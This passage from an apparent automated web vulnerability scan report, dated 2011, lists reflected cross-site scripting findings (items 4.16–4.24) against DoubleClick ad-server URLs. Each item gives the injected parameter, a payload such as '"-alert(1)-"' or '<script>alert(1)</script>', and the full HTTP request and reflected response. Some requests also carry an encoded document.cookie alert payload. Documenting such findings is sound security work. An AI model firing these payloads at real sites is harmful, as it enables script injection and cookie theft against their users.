...[SNIP]...
JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0ahttp://degrees.classesusa.com/schools/?sourceid=50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 300;
var winH =
...[SNIP]...

4.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138f5"-alert(1)-"eada4e3efbc was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
i8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg
...[SNIP]...

4.17. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66758"-alert(1)-"219072ecf8b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW
...[SNIP]...

4.18. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78291"-alert(1)-"1aa4fa9a8f0 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";

...[SNIP]...

4.19. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3a0"-alert(1)-"cc96eba19d7 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var
...[SNIP]...

4.20. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31220"-alert(1)-"5c310f7490c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/f/1fe/%2a/c%3B232704189%3B1-0%3B0%3B50545246%3B4307-300/250%3B40436189/40453976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5u
...[SNIP]...

4.21. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.msn-dm/B2343920.67

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3d94"-alert(1)-"3cf86d08147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4153

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
.net/click%3Bh%3Dv8/3aa2/f/6b/%2a/u%3B222980277%3B4-0%3B0%3B25708763%3B4307-300/250%3B40308306/40326093/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D25708763-222980277-40326093");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 3
...[SNIP]...

4.22. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.msn-dm/B2343920.67

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2487d"-alert(1)-"2c5b6b5daa5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4163

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
k.net/click%3Bh%3Dv8/3aa2/7/68/%2a/p%3B222980277%3B2-0%3B0%3B25708763%3B4307-300/250%3B40114169/40131956/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-40131956");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 300;
var winH
...[SNIP]...

4.23. http://ad.doubleclick.net/adi/dmd.ehow/computers [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/computers

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f361"><script>alert(1)</script>7e001703d00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/dmd.ehow/computers6f361"><script>alert(1)</script>7e001703d00;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 593

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers6f361"><script>alert(1)</script>7e001703d00&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f">
...[SNIP]...

4.24. http://ad.doubleclick.net/adi/dmd.ehow/homepage [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/homepage

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c21"><script>alert(1)</script>57155bc0307 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/dmd.ehow/homepagee1c21"><script>alert(1)</script>57155bc0307;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:28:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 592

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
